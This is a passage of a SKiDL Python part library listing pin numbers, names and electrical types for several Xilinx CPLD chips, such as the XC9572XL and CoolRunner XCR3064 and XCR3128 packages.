Pin(num='43',name='P43',func=Pin.BIDIR,do_erc=True),
Pin(num='53',name='P53',func=Pin.BIDIR,do_erc=True),
Pin(num='63',name='TDI',func=Pin.BIDIR,do_erc=True),
Pin(num='73',name='VCCIO',func=Pin.PWRIN,do_erc=True),
Pin(num='83',name='P83',func=Pin.BIDIR,do_erc=True),
Pin(num='93',name='P93',func=Pin.BIDIR,do_erc=True),
Pin(num='14',name='P14',func=Pin.BIDIR,do_erc=True),
Pin(num='24',name='P24',func=Pin.BIDIR,do_erc=True),
Pin(num='34',name='P34',func=Pin.BIDIR,do_erc=True),
Pin(num='44',name='P44',func=Pin.BIDIR,do_erc=True),
Pin(num='54',name='P54',func=Pin.BIDIR,do_erc=True),
Pin(num='64',name='P64',func=Pin.BIDIR,do_erc=True),
Pin(num='74',name='P74',func=Pin.BIDIR,do_erc=True),
Pin(num='84',name='VCCINT',func=Pin.PWRIN,do_erc=True),
Pin(num='94',name='P94',func=Pin.BIDIR,do_erc=True),
Pin(num='15',name='P15',func=Pin.BIDIR,do_erc=True),
Pin(num='25',name='P25',func=Pin.BIDIR,do_erc=True),
Pin(num='35',name='P35',func=Pin.BIDIR,do_erc=True),
Pin(num='45',name='P45',func=Pin.BIDIR,do_erc=True),
Pin(num='55',name='VCCIO',func=Pin.PWRIN,do_erc=True),
Pin(num='65',name='TMS',func=Pin.BIDIR,do_erc=True),
Pin(num='75',name='P75',func=Pin.BIDIR,do_erc=True),
Pin(num='85',name='P85',func=Pin.BIDIR,do_erc=True),
Pin(num='95',name='P95',func=Pin.BIDIR,do_erc=True),
Pin(num='16',name='P16',func=Pin.BIDIR,do_erc=True),
Pin(num='26',name='P26',func=Pin.BIDIR,do_erc=True),
Pin(num='36',name='GND',func=Pin.PWRIN,do_erc=True),
Pin(num='46',name='P46',func=Pin.BIDIR,do_erc=True),
Pin(num='56',name='P56',func=Pin.BIDIR,do_erc=True),
Pin(num='66',name='P66',func=Pin.BIDIR,do_erc=True),
Pin(num='76',name='P76',func=Pin.BIDIR,do_erc=True),
Pin(num='86',name='P86',func=Pin.BIDIR,do_erc=True),
Pin(num='96',name='P96',func=Pin.BIDIR,do_erc=True),
Pin(num='17',name='P17',func=Pin.BIDIR,do_erc=True),
Pin(num='27',name='P27',func=Pin.BIDIR,do_erc=True),
Pin(num='37',name='VCCIO',func=Pin.PWRIN,do_erc=True),
Pin(num='47',name='GND',func=Pin.PWRIN,do_erc=True),
Pin(num='57',name='P57',func=Pin.BIDIR,do_erc=True),
Pin(num='67',name='TCK',func=Pin.BIDIR,do_erc=True),
Pin(num='77',name='P77',func=Pin.BIDIR,do_erc=True),
Pin(num='87',name='P87',func=Pin.BIDIR,do_erc=True),
Pin(num='97',name='P97',func=Pin.BIDIR,do_erc=True),
Pin(num='18',name='GND',func=Pin.PWRIN,do_erc=True),
Pin(num='28',name='P28',func=Pin.BIDIR,do_erc=True),
Pin(num='38',name='I/O/GCK3',func=Pin.BIDIR,do_erc=True),
Pin(num='48',name='P48',func=Pin.BIDIR,do_erc=True),
Pin(num='58',name='P58',func=Pin.BIDIR,do_erc=True),
Pin(num='68',name='P68',func=Pin.BIDIR,do_erc=True),
Pin(num='78',name='P78',func=Pin.BIDIR,do_erc=True),
Pin(num='88',name='P88',func=Pin.BIDIR,do_erc=True),
Pin(num='98',name='P98',func=Pin.BIDIR,do_erc=True),
Pin(num='19',name='P19',func=Pin.BIDIR,do_erc=True),
Pin(num='29',name='GND',func=Pin.PWRIN,do_erc=True),
Pin(num='39',name='P39',func=Pin.BIDIR,do_erc=True),
Pin(num='49',name='P49',func=Pin.BIDIR,do_erc=True),
Pin(num='59',name='P59',func=Pin.BIDIR,do_erc=True),
Pin(num='69',name='P69',func=Pin.BIDIR,do_erc=True),
Pin(num='79',name='P79',func=Pin.BIDIR,do_erc=True),
Pin(num='89',name='GND',func=Pin.PWRIN,do_erc=True),
Pin(num='99',name='GND',func=Pin.PWRIN,do_erc=True),
Pin(num='100',name='P100',func=Pin.BIDIR,do_erc=True),
Pin(num='110',name='P110',func=Pin.BIDIR,do_erc=True),
Pin(num='120',name='P120',func=Pin.BIDIR,do_erc=True),
Pin(num='130',name='P130',func=Pin.BIDIR,do_erc=True),
Pin(num='140',name='P140',func=Pin.BIDIR,do_erc=True),
Pin(num='101',name='P101',func=Pin.BIDIR,do_erc=True),
Pin(num='111',name='P111',func=Pin.BIDIR,do_erc=True),
Pin(num='121',name='P121',func=Pin.BIDIR,do_erc=True),
Pin(num='131',name='P131',func=Pin.BIDIR,do_erc=True),
Pin(num='141',name='VCCINT',func=Pin.PWRIN,do_erc=True),
Pin(num='102',name='P102',func=Pin.BIDIR,do_erc=True),
Pin(num='112',name='P112',func=Pin.BIDIR,do_erc=True),
Pin(num='122',name='TDO',func=Pin.BIDIR,do_erc=True),
Pin(num='132',name='P132',func=Pin.BIDIR,do_erc=True),
Pin(num='142',name='P142',func=Pin.BIDIR,do_erc=True),
Pin(num='103',name='P103',func=Pin.BIDIR,do_erc=True),
Pin(num='113',name='P113',func=Pin.BIDIR,do_erc=True),
Pin(num='123',name='GND',func=Pin.PWRIN,do_erc=True),
Pin(num='133',name='P133',func=Pin.BIDIR,do_erc=True),
Pin(num='143',name='I/O/GSR',func=Pin.BIDIR,do_erc=True),
Pin(num='104',name='P104',func=Pin.BIDIR,do_erc=True),
Pin(num='114',name='GND',func=Pin.PWRIN,do_erc=True),
Pin(num='124',name='P124',func=Pin.BIDIR,do_erc=True),
Pin(num='134',name='P134',func=Pin.BIDIR,do_erc=True),
Pin(num='144',name='GND',func=Pin.PWRIN,do_erc=True),
Pin(num='105',name='P105',func=Pin.BIDIR,do_erc=True),
Pin(num='115',name='P115',func=Pin.BIDIR,do_erc=True),
Pin(num='125',name='P125',func=Pin.BIDIR,do_erc=True),
Pin(num='135',name='P135',func=Pin.BIDIR,do_erc=True),
Pin(num='106',name='P106',func=Pin.BIDIR,do_erc=True),
Pin(num='116',name='P116',func=Pin.BIDIR,do_erc=True),
Pin(num='126',name='P126',func=Pin.BIDIR,do_erc=True),
Pin(num='136',name='P136',func=Pin.BIDIR,do_erc=True),
Pin(num='107',name='P107',func=Pin.BIDIR,do_erc=True),
Pin(num='117',name='P117',func=Pin.BIDIR,do_erc=True),
Pin(num='127',name='VCCIO',func=Pin.PWRIN,do_erc=True),
Pin(num='137',name='P137',func=Pin.BIDIR,do_erc=True),
Pin(num='108',name='GND',func=Pin.PWRIN,do_erc=True),
Pin(num='118',name='P118',func=Pin.BIDIR,do_erc=True),
Pin(num='128',name='P128',func=Pin.BIDIR,do_erc=True),
Pin(num='138',name='P138',func=Pin.BIDIR,do_erc=True),
Pin(num='109',name='VCCIO',func=Pin.PWRIN,do_erc=True),
Pin(num='119',name='P119',func=Pin.BIDIR,do_erc=True),
Pin(num='129',name='P129',func=Pin.BIDIR,do_erc=True),
Pin(num='139',name='P139',func=Pin.BIDIR,do_erc=True)]),
Part(name='XC9536PC44',dest=TEMPLATE,tool=SKIDL,ref_prefix='U',num_units=1,do_erc=True,pins=[
Pin(num='1',name='M1',func=Pin.BIDIR,do_erc=True),
Pin(num='2',name='M1',func=Pin.BIDIR,do_erc=True),
Pin(num='3',name='M2',func=Pin.BIDIR,do_erc=True),
Pin(num='4',name='M4',func=Pin.BIDIR,do_erc=True),
Pin(num='5',name='I/O/GCK1',func=Pin.BIDIR,do_erc=True),
Pin(num='6',name='I/O/GCK2',func=Pin.BIDIR,do_erc=True),
Pin(num='7',name='I/O/GCK3',func=Pin.BIDIR,do_erc=True),
Pin(num='8',name='M6',func=Pin.BIDIR,do_erc=True),
Pin(num='9',name='M8',func=Pin.BIDIR,do_erc=True),
Pin(num='10',name='GND',func=Pin.PWRIN,do_erc=True),
Pin(num='20',name='M15',func=Pin.BIDIR,do_erc=True),
Pin(num='30',name='TDO',func=Pin.OUTPUT,do_erc=True),
Pin(num='40',name='I/O/GTS2',func=Pin.BIDIR,do_erc=True),
Pin(num='11',name='M9',func=Pin.BIDIR,do_erc=True),
Pin(num='21',name='VCC',func=Pin.PWRIN,do_erc=True),
Pin(num='31',name='GND',func=Pin.PWRIN,do_erc=True),
Pin(num='41',name='VCC',func=Pin.PWRIN,do_erc=True),
Pin(num='12',name='M10',func=Pin.BIDIR,do_erc=True),
Pin(num='22',name='M16',func=Pin.BIDIR,do_erc=True),
Pin(num='32',name='VCCIO',func=Pin.PWRIN,do_erc=True),
Pin(num='42',name='I/O/GTS1',func=Pin.BIDIR,do_erc=True),
Pin(num='13',name='M11',func=Pin.BIDIR,do_erc=True),
Pin(num='23',name='GND',func=Pin.PWRIN,do_erc=True),
Pin(num='33',name='M12',func=Pin.BIDIR,do_erc=True),
Pin(num='43',name='M4',func=Pin.BIDIR,do_erc=True),
Pin(num='14',name='M12',func=Pin.BIDIR,do_erc=True),
Pin(num='24',name='M17',func=Pin.BIDIR,do_erc=True),
Pin(num='34',name='M11',func=Pin.BIDIR,do_erc=True),
Pin(num='44',name='M2',func=Pin.BIDIR,do_erc=True),
Pin(num='15',name='TDI',do_erc=True),
Pin(num='25',name='M17',func=Pin.BIDIR,do_erc=True),
Pin(num='35',name='M10',func=Pin.BIDIR,do_erc=True),
Pin(num='16',name='TMS',do_erc=True),
Pin(num='26',name='M16',func=Pin.BIDIR,do_erc=True),
Pin(num='36',name='M9',func=Pin.BIDIR,do_erc=True),
Pin(num='17',name='TCK',do_erc=True),
Pin(num='27',name='M15',func=Pin.BIDIR,do_erc=True),
Pin(num='37',name='M8',func=Pin.BIDIR,do_erc=True),
Pin(num='18',name='M13',func=Pin.BIDIR,do_erc=True),
Pin(num='28',name='M14',func=Pin.BIDIR,do_erc=True),
Pin(num='38',name='M7',func=Pin.BIDIR,do_erc=True),
Pin(num='19',name='M14',func=Pin.BIDIR,do_erc=True),
Pin(num='29',name='M13',func=Pin.BIDIR,do_erc=True),
Pin(num='39',name='I/O/GSR',func=Pin.BIDIR,do_erc=True)]),
Part(name='XC9572XL-TQ100',dest=TEMPLATE,tool=SKIDL,keywords='CPLD',description='CPLD, 72 macrocells, 1600 usable gates',ref_prefix='U',num_units=1,fplist=['TQFP*14x14mm*Pitch0.5mm*'],do_erc=True,pins=[
Pin(num='1',name='I/O/GTS3',func=Pin.BIDIR,do_erc=True),
Pin(num='2',name='NC',func=Pin.NOCONNECT,do_erc=True),
Pin(num='3',name='I/O/GTS1',func=Pin.BIDIR,do_erc=True),
Pin(num='4',name='I/O/GTS2',func=Pin.BIDIR,do_erc=True),
Pin(num='5',name='VCC',func=Pin.PWRIN,do_erc=True),
Pin(num='6',name='P6',func=Pin.BIDIR,do_erc=True),
Pin(num='7',name='NC',func=Pin.NOCONNECT,do_erc=True),
Pin(num='8',name='P8',func=Pin.BIDIR,do_erc=True),
Pin(num='9',name='P9',func=Pin.BIDIR,do_erc=True),
Pin(num='10',name='P10',func=Pin.BIDIR,do_erc=True),
Pin(num='20',name='P20',func=Pin.BIDIR,do_erc=True),
Pin(num='30',name='P30',func=Pin.BIDIR,do_erc=True),
Pin(num='40',name='P40',func=Pin.BIDIR,do_erc=True),
Pin(num='50',name='P50',func=Pin.BIDIR,do_erc=True),
Pin(num='60',name='P60',func=Pin.BIDIR,do_erc=True),
Pin(num='70',name='P70',func=Pin.BIDIR,do_erc=True),
Pin(num='80',name='NC',func=Pin.NOCONNECT,do_erc=True),
Pin(num='90',name='P90',func=Pin.BIDIR,do_erc=True),
Pin(num='11',name='P11',func=Pin.BIDIR,do_erc=True),
Pin(num='21',name='GND',func=Pin.PWRIN,do_erc=True),
Pin(num='31',name='GND',func=Pin.PWRIN,do_erc=True),
Pin(num='41',name='P41',func=Pin.BIDIR,do_erc=True),
Pin(num='51',name='VCCIO',func=Pin.PWRIN,do_erc=True),
Pin(num='61',name='P61',func=Pin.BIDIR,do_erc=True),
Pin(num='71',name='P71',func=Pin.BIDIR,do_erc=True),
Pin(num='81',name='P81',func=Pin.BIDIR,do_erc=True),
Pin(num='91',name='P91',func=Pin.BIDIR,do_erc=True),
Pin(num='12',name='P12',func=Pin.BIDIR,do_erc=True),
Pin(num='22',name='I/O/GCK1',func=Pin.BIDIR,do_erc=True),
Pin(num='32',name='P32',func=Pin.BIDIR,do_erc=True),
Pin(num='42',name='P42',func=Pin.BIDIR,do_erc=True),
Pin(num='52',name='P52',func=Pin.BIDIR,do_erc=True),
Pin(num='62',name='GND',func=Pin.PWRIN,do_erc=True),
Pin(num='72',name='P72',func=Pin.BIDIR,do_erc=True),
Pin(num='82',name='P82',func=Pin.BIDIR,do_erc=True),
Pin(num='92',name='P92',func=Pin.BIDIR,do_erc=True),
Pin(num='13',name='P13',func=Pin.BIDIR,do_erc=True),
Pin(num='23',name='I/O/GCK2',func=Pin.BIDIR,do_erc=True),
Pin(num='33',name='P33',func=Pin.BIDIR,do_erc=True),
Pin(num='43',name='NC',func=Pin.NOCONNECT,do_erc=True),
Pin(num='53',name='P53',func=Pin.BIDIR,do_erc=True),
Pin(num='63',name='P63',func=Pin.BIDIR,do_erc=True),
Pin(num='73',name='NC',func=Pin.NOCONNECT,do_erc=True),
Pin(num='83',name='TDO',func=Pin.OUTPUT,do_erc=True),
Pin(num='93',name='P93',func=Pin.BIDIR,do_erc=True),
Pin(num='14',name='P14',func=Pin.BIDIR,do_erc=True),
Pin(num='24',name='NC',func=Pin.NOCONNECT,do_erc=True),
Pin(num='34',name='NC',func=Pin.NOCONNECT,do_erc=True),
Pin(num='44',name='GND',func=Pin.PWRIN,do_erc=True),
Pin(num='54',name='P54',func=Pin.BIDIR,do_erc=True),
Pin(num='64',name='P64',func=Pin.BIDIR,do_erc=True),
Pin(num='74',name='P74',func=Pin.BIDIR,do_erc=True),
Pin(num='84',name='GND',func=Pin.PWRIN,do_erc=True),
Pin(num='94',name='P94',func=Pin.BIDIR,do_erc=True),
Pin(num='15',name='P15',func=Pin.BIDIR,do_erc=True),
Pin(num='25',name='P25',func=Pin.BIDIR,do_erc=True),
Pin(num='35',name='P35',func=Pin.BIDIR,do_erc=True),
Pin(num='45',name='TDI',do_erc=True),
Pin(num='55',name='P55',func=Pin.BIDIR,do_erc=True),
Pin(num='65',name='P65',func=Pin.BIDIR,do_erc=True),
Pin(num='75',name='GND',func=Pin.PWRIN,do_erc=True),
Pin(num='85',name='P85',func=Pin.BIDIR,do_erc=True),
Pin(num='95',name='P95',func=Pin.BIDIR,do_erc=True),
Pin(num='16',name='P16',func=Pin.BIDIR,do_erc=True),
Pin(num='26',name='VCCIO',func=Pin.PWRIN,do_erc=True),
Pin(num='36',name='P36',func=Pin.BIDIR,do_erc=True),
Pin(num='46',name='NC',func=Pin.NOCONNECT,do_erc=True),
Pin(num='56',name='P56',func=Pin.BIDIR,do_erc=True),
Pin(num='66',name='P66',func=Pin.BIDIR,do_erc=True),
Pin(num='76',name='P76',func=Pin.BIDIR,do_erc=True),
Pin(num='86',name='P86',func=Pin.BIDIR,do_erc=True),
Pin(num='96',name='P96',func=Pin.BIDIR,do_erc=True),
Pin(num='17',name='P17',func=Pin.BIDIR,do_erc=True),
Pin(num='27',name='I/O/GCK3',func=Pin.BIDIR,do_erc=True),
Pin(num='37',name='P37',func=Pin.BIDIR,do_erc=True),
Pin(num='47',name='TMS',do_erc=True),
Pin(num='57',name='VCC',func=Pin.PWRIN,do_erc=True),
Pin(num='67',name='P67',func=Pin.BIDIR,do_erc=True),
Pin(num='77',name='P77',func=Pin.BIDIR,do_erc=True),
Pin(num='87',name='P87',func=Pin.BIDIR,do_erc=True),
Pin(num='97',name='P97',func=Pin.BIDIR,do_erc=True),
Pin(num='18',name='P18',func=Pin.BIDIR,do_erc=True),
Pin(num='28',name='P28',func=Pin.BIDIR,do_erc=True),
Pin(num='38',name='VCCIO',func=Pin.PWRIN,do_erc=True),
Pin(num='48',name='TCK',do_erc=True),
Pin(num='58',name='P58',func=Pin.BIDIR,do_erc=True),
Pin(num='68',name='P68',func=Pin.BIDIR,do_erc=True),
Pin(num='78',name='P78',func=Pin.BIDIR,do_erc=True),
Pin(num='88',name='VCCIO',func=Pin.PWRIN,do_erc=True),
Pin(num='98',name='VCC',func=Pin.PWRIN,do_erc=True),
Pin(num='19',name='NC',func=Pin.NOCONNECT,do_erc=True),
Pin(num='29',name='P29',func=Pin.BIDIR,do_erc=True),
Pin(num='39',name='P39',func=Pin.BIDIR,do_erc=True),
Pin(num='49',name='P49',func=Pin.BIDIR,do_erc=True),
Pin(num='59',name='P59',func=Pin.BIDIR,do_erc=True),
Pin(num='69',name='GND',func=Pin.PWRIN,do_erc=True),
Pin(num='79',name='P79',func=Pin.BIDIR,do_erc=True),
Pin(num='89',name='P89',func=Pin.BIDIR,do_erc=True),
Pin(num='99',name='I/O/GSR',func=Pin.BIDIR,do_erc=True),
Pin(num='100',name='GND',func=Pin.PWRIN,do_erc=True)]),
Part(name='XCF08P',dest=TEMPLATE,tool=SKIDL,do_erc=True),
Part(name='XCR3064-VQ100',dest=TEMPLATE,tool=SKIDL,description='Xilinx CoolRunner',ref_prefix='U',num_units=1,do_erc=True,pins=[
Pin(num='3',name='VCC',func=Pin.PWRIN,do_erc=True),
Pin(num='4',name='B8/TDI',func=Pin.PASSIVE,do_erc=True),
Pin(num='6',name='B9',func=Pin.PASSIVE,do_erc=True),
Pin(num='8',name='B10',func=Pin.PASSIVE,do_erc=True),
Pin(num='9',name='B11',func=Pin.PASSIVE,do_erc=True),
Pin(num='10',name='B12',func=Pin.PASSIVE,do_erc=True),
Pin(num='20',name='D4',func=Pin.PASSIVE,do_erc=True),
Pin(num='30',name='D9',func=Pin.PASSIVE,do_erc=True),
Pin(num='40',name='C15',func=Pin.PASSIVE,do_erc=True),
Pin(num='60',name='C2',func=Pin.PASSIVE,do_erc=True),
Pin(num='80',name='A4',func=Pin.PASSIVE,do_erc=True),
Pin(num='90',name='CLK0/IN0',do_erc=True),
Pin(num='11',name='PORT_EN',func=Pin.PASSIVE,do_erc=True),
Pin(num='21',name='D5',func=Pin.PASSIVE,do_erc=True),
Pin(num='31',name='D10',func=Pin.PASSIVE,do_erc=True),
Pin(num='41',name='C14',func=Pin.PASSIVE,do_erc=True),
Pin(num='51',name='VCC',func=Pin.PWRIN,do_erc=True),
Pin(num='61',name='C1',func=Pin.PASSIVE,do_erc=True),
Pin(num='71',name='A9',func=Pin.PASSIVE,do_erc=True),
Pin(num='81',name='A3',func=Pin.PASSIVE,do_erc=True),
Pin(num='91',name='VCC',func=Pin.PWRIN,do_erc=True),
Pin(num='12',name='B13',func=Pin.PASSIVE,do_erc=True),
Pin(num='32',name='D11',func=Pin.PASSIVE,do_erc=True),
Pin(num='42',name='C13',func=Pin.PASSIVE,do_erc=True),
Pin(num='52',name='C7',func=Pin.PASSIVE,do_erc=True),
Pin(num='62',name='C0/TCK',func=Pin.PASSIVE,do_erc=True),
Pin(num='82',name='VCC',func=Pin.PWRIN,do_erc=True),
Pin(num='92',name='B0',func=Pin.PASSIVE,do_erc=True),
Pin(num='13',name='B14',func=Pin.PASSIVE,do_erc=True),
Pin(num='23',name='D6',func=Pin.PASSIVE,do_erc=True),
Pin(num='33',name='D12',func=Pin.PASSIVE,do_erc=True),
Pin(num='43',name='GND',func=Pin.PWRIN,do_erc=True),
Pin(num='63',name='A15',func=Pin.PASSIVE,do_erc=True),
Pin(num='73',name='A8/TDO',func=Pin.PASSIVE,do_erc=True),
Pin(num='83',name='A2',func=Pin.PASSIVE,do_erc=True),
Pin(num='93',name='B1',func=Pin.PASSIVE,do_erc=True),
Pin(num='14',name='B15',func=Pin.PASSIVE,do_erc=True),
Pin(num='34',name='VCC',func=Pin.PWRIN,do_erc=True),
Pin(num='44',name='C12',func=Pin.PASSIVE,do_erc=True),
Pin(num='54',name='C6',func=Pin.PASSIVE,do_erc=True),
Pin(num='64',name='A14',func=Pin.PASSIVE,do_erc=True),
Pin(num='74',name='GND',func=Pin.PWRIN,do_erc=True),
Pin(num='84',name='A1',func=Pin.PASSIVE,do_erc=True),
Pin(num='94',name='B2',func=Pin.PASSIVE,do_erc=True),
Pin(num='15',name='D0/TMS',func=Pin.PASSIVE,do_erc=True),
Pin(num='25',name='D7',func=Pin.PASSIVE,do_erc=True),
Pin(num='35',name='D13',func=Pin.PASSIVE,do_erc=True),
Pin(num='45',name='C11',func=Pin.PASSIVE,do_erc=True),
Pin(num='65',name='A13',func=Pin.PASSIVE,do_erc=True),
Pin(num='75',name='A7',func=Pin.PASSIVE,do_erc=True),
Pin(num='85',name='A0',func=Pin.PASSIVE,do_erc=True),
Pin(num='95',name='GND',func=Pin.PWRIN,do_erc=True),
Pin(num='16',name='D1',func=Pin.PASSIVE,do_erc=True),
Pin(num='26',name='GND',func=Pin.PWRIN,do_erc=True),
Pin(num='36',name='D14',func=Pin.PASSIVE,do_erc=True),
Pin(num='46',name='C10',func=Pin.PASSIVE,do_erc=True),
Pin(num='56',name='C5',func=Pin.PASSIVE,do_erc=True),
Pin(num='66',name='VCC',func=Pin.PWRIN,do_erc=True),
Pin(num='76',name='A6',func=Pin.PASSIVE,do_erc=True),
Pin(num='86',name='GND',func=Pin.PWRIN,do_erc=True),
Pin(num='96',name='B3',func=Pin.PASSIVE,do_erc=True),
Pin(num='17',name='D2',func=Pin.PASSIVE,do_erc=True),
Pin(num='37',name='D15',func=Pin.PASSIVE,do_erc=True),
Pin(num='47',name='C9',func=Pin.PASSIVE,do_erc=True),
Pin(num='57',name='C4',func=Pin.PASSIVE,do_erc=True),
Pin(num='67',name='A12',func=Pin.PASSIVE,do_erc=True),
Pin(num='87',name='CLK3/IN3',do_erc=True),
Pin(num='97',name='B4',func=Pin.PASSIVE,do_erc=True),
Pin(num='18',name='VCC',func=Pin.PWRIN,do_erc=True),
Pin(num='38',name='GND',func=Pin.PWRIN,do_erc=True),
Pin(num='48',name='C8',func=Pin.PASSIVE,do_erc=True),
Pin(num='58',name='C3',func=Pin.PASSIVE,do_erc=True),
Pin(num='68',name='A11',func=Pin.PASSIVE,do_erc=True),
Pin(num='88',name='CLK2/IN2',do_erc=True),
Pin(num='98',name='B5',func=Pin.PASSIVE,do_erc=True),
Pin(num='19',name='D3',func=Pin.PASSIVE,do_erc=True),
Pin(num='29',name='D8',func=Pin.PASSIVE,do_erc=True),
Pin(num='39',name='VCC',func=Pin.PWRIN,do_erc=True),
Pin(num='59',name='GND',func=Pin.PWRIN,do_erc=True),
Pin(num='69',name='A10',func=Pin.PASSIVE,do_erc=True),
Pin(num='79',name='A5',func=Pin.PASSIVE,do_erc=True),
Pin(num='89',name='CLK1/IN1',do_erc=True),
Pin(num='99',name='B6',func=Pin.PASSIVE,do_erc=True),
Pin(num='100',name='B7',func=Pin.PASSIVE,do_erc=True)]),
Part(name='XCR3064-VQ44',dest=TEMPLATE,tool=SKIDL,description='Xilinx CoolRunner',ref_prefix='U',num_units=1,do_erc=True,pins=[
Pin(num='1',name='TDI',func=Pin.PASSIVE,do_erc=True),
Pin(num='2',name='B9',func=Pin.PASSIVE,do_erc=True),
Pin(num='3',name='B10',func=Pin.PASSIVE,do_erc=True),
Pin(num='4',name='PORT_EN',func=Pin.PASSIVE,do_erc=True),
Pin(num='5',name='B13',func=Pin.PASSIVE,do_erc=True),
Pin(num='6',name='B14',func=Pin.PASSIVE,do_erc=True),
Pin(num='7',name='TMS',func=Pin.PASSIVE,do_erc=True),
Pin(num='8',name='D1',func=Pin.PASSIVE,do_erc=True),
Pin(num='9',name='VCC',func=Pin.PWRIN,do_erc=True),
Pin(num='10',name='D3',func=Pin.PASSIVE,do_erc=True),
Pin(num='20',name='C10',func=Pin.PASSIVE,do_erc=True),
Pin(num='30',name='A10',func=Pin.PASSIVE,do_erc=True),
Pin(num='40',name='CLC0/IN0',do_erc=True),
Pin(num='11',name='D4',func=Pin.PASSIVE,do_erc=True),
Pin(num='21',name='C9',func=Pin.PASSIVE,do_erc=True),
Pin(num='31',name='A9',func=Pin.PASSIVE,do_erc=True),
Pin(num='41',name='VCC',func=Pin.PWRIN,do_erc=True),
Pin(num='12',name='D8',func=Pin.PASSIVE,do_erc=True),
Pin(num='22',name='C8',func=Pin.PASSIVE,do_erc=True),
Pin(num='32',name='TDO',func=Pin.PASSIVE,do_erc=True),
Pin(num='42',name='B0',func=Pin.PASSIVE,do_erc=True),
Pin(num='13',name='D9',func=Pin.PASSIVE,do_erc=True),
Pin(num='23',name='C3',func=Pin.PASSIVE,do_erc=True),
Pin(num='33',name='A7',func=Pin.PASSIVE,do_erc=True),
Pin(num='43',name='B1',func=Pin.PASSIVE,do_erc=True),
Pin(num='14',name='D10',func=Pin.PASSIVE,do_erc=True),
Pin(num='24',name='GND',func=Pin.PWRIN,do_erc=True),
Pin(num='34',name='A1',func=Pin.PASSIVE,do_erc=True),
Pin(num='44',name='B2',func=Pin.PASSIVE,do_erc=True),
Pin(num='15',name='D11',func=Pin.PASSIVE,do_erc=True),
Pin(num='25',name='C1',func=Pin.PASSIVE,do_erc=True),
Pin(num='35',name='A0',func=Pin.PASSIVE,do_erc=True),
Pin(num='16',name='GND',func=Pin.PWRIN,do_erc=True),
Pin(num='26',name='TCK',func=Pin.PASSIVE,do_erc=True),
Pin(num='36',name='GND',func=Pin.PWRIN,do_erc=True),
Pin(num='17',name='VCC',func=Pin.PWRIN,do_erc=True),
Pin(num='27',name='A14',func=Pin.PASSIVE,do_erc=True),
Pin(num='37',name='CLK3/IN3',do_erc=True),
Pin(num='18',name='C12',func=Pin.PASSIVE,do_erc=True),
Pin(num='28',name='A13',func=Pin.PASSIVE,do_erc=True),
Pin(num='38',name='CLK2/IN2',do_erc=True),
Pin(num='19',name='C11',func=Pin.PASSIVE,do_erc=True),
Pin(num='29',name='VCC',func=Pin.PWRIN,do_erc=True),
Pin(num='39',name='CLK1/IN1',do_erc=True)]),
Part(name='XCR3128-VQ100',dest=TEMPLATE,tool=SKIDL,description='Xilinx CoolRunner',ref_prefix='U',num_units=1,do_erc=True,pins=[
Pin(num='1',name='E1',func=Pin.PASSIVE,do_erc=True),
Pin(num='2',name='E0',func=Pin.PASSIVE,do_erc=True),
Pin(num='3',name='VCC',func=Pin.PWRIN,do_erc=True),
Pin(num='4',name='F1/TDI',func=Pin.PASSIVE,do_erc=True),
Pin(num='5',name='F2',func=Pin.PASSIVE,do_erc=True),
Pin(num='6',name='F3',func=Pin.PASSIVE,do_erc=True),
Pin(num='7',name='F4',func=Pin.PASSIVE,do_erc=True),
Pin(num='8',name='F5',func=Pin.PASSIVE,do_erc=True),
Pin(num='9',name='F6',func=Pin.PASSIVE,do_erc=True),
Pin(num='10',name='F10',func=Pin.PASSIVE,do_erc=True),
Pin(num='20',name='H6',func=Pin.PASSIVE,do_erc=True),
Pin(num='30',name='G10',func=Pin.PASSIVE,do_erc=True),
Pin(num='40',name='D1',func=Pin.PASSIVE,do_erc=True),
Pin(num='50',name='D13',func=Pin.PASSIVE,do_erc=True),
Pin(num='60',name='C3',func=Pin.PASSIVE,do_erc=True),
Pin(num='70',name='A4',func=Pin.PASSIVE,do_erc=True),
Pin(num='80',name='B5',func=Pin.PASSIVE,do_erc=True),
Pin(num='90',name='CLK0/IN0',do_erc=True),
Pin(num='11',name='PORT_EN',func=Pin.PASSIVE,do_erc=True),
Pin(num='21',name='H10',func=Pin.PASSIVE,do_erc=True),
Pin(num='31',name='G6',func=Pin.PASSIVE,do_erc=True),
Pin(num='41',name='D2',func=Pin.PASSIVE,do_erc=True),
Pin(num='51',name='VCC',func=Pin.PWRIN,do_erc=True),
Pin(num='61',name='C2',func=Pin.PASSIVE,do_erc=True),
Pin(num='71',name='A3',func=Pin.PASSIVE,do_erc=True),
Pin(num='81',name='B6',func=Pin.PASSIVE,do_erc=True),
Pin(num='91',name='VCC',func=Pin.PWRIN,do_erc=True),
Pin(num='12',name='F13',func=Pin.PASSIVE,do_erc=True),
Pin(num='22',name='H11',func=Pin.PASSIVE,do_erc=True),
Pin(num='32',name='G5',func=Pin.PASSIVE,do_erc=True),
Pin(num='42',name='D3',func=Pin.PASSIVE,do_erc=True),
Pin(num='52',name='C14',func=Pin.PASSIVE,do_erc=True),
Pin(num='62',name='C1/TCK',func=Pin.PASSIVE,do_erc=True),
Pin(num='72',name='A2',func=Pin.PASSIVE,do_erc=True),
Pin(num='82',name='VCC',func=Pin.PWRIN,do_erc=True),
Pin(num='92',name='E14',func=Pin.PASSIVE,do_erc=True),
Pin(num='13',name='F14',func=Pin.PASSIVE,do_erc=True),
Pin(num='23',name='H12',func=Pin.PASSIVE,do_erc=True),
Pin(num='33',name='G4',func=Pin.PASSIVE,do_erc=True),
Pin(num='43',name='GND',func=Pin.PWRIN,do_erc=True),
Pin(num='53',name='C13',func=Pin.PASSIVE,do_erc=True),
Pin(num='63',name='A14',func=Pin.PASSIVE,do_erc=True),
Pin(num='73',name='A1/TDO',func=Pin.PASSIVE,do_erc=True),
Pin(num='83',name='B10',func=Pin.PASSIVE,do_erc=True),
Pin(num='93',name='E13',func=Pin.PASSIVE,do_erc=True),
Pin(num='14',name='F15',func=Pin.PASSIVE,do_erc=True),
Pin(num='24',name='H13',func=Pin.PASSIVE,do_erc=True),
Pin(num='34',name='VCC',func=Pin.PWRIN,do_erc=True),
Pin(num='44',name='D4',func=Pin.PASSIVE,do_erc=True),
Pin(num='54',name='C12',func=Pin.PASSIVE,do_erc=True),
Pin(num='64',name='A13',func=Pin.PASSIVE,do_erc=True),
Pin(num='74',name='GND',func=Pin.PWRIN,do_erc=True),
Pin(num='84',name='B11',func=Pin.PASSIVE,do_erc=True),
Pin(num='94',name='E12',func=Pin.PASSIVE,do_erc=True),
Pin(num='15',name='H1/TMS',func=Pin.PASSIVE,do_erc=True),
Pin(num='25',name='H14',func=Pin.PASSIVE,do_erc=True),
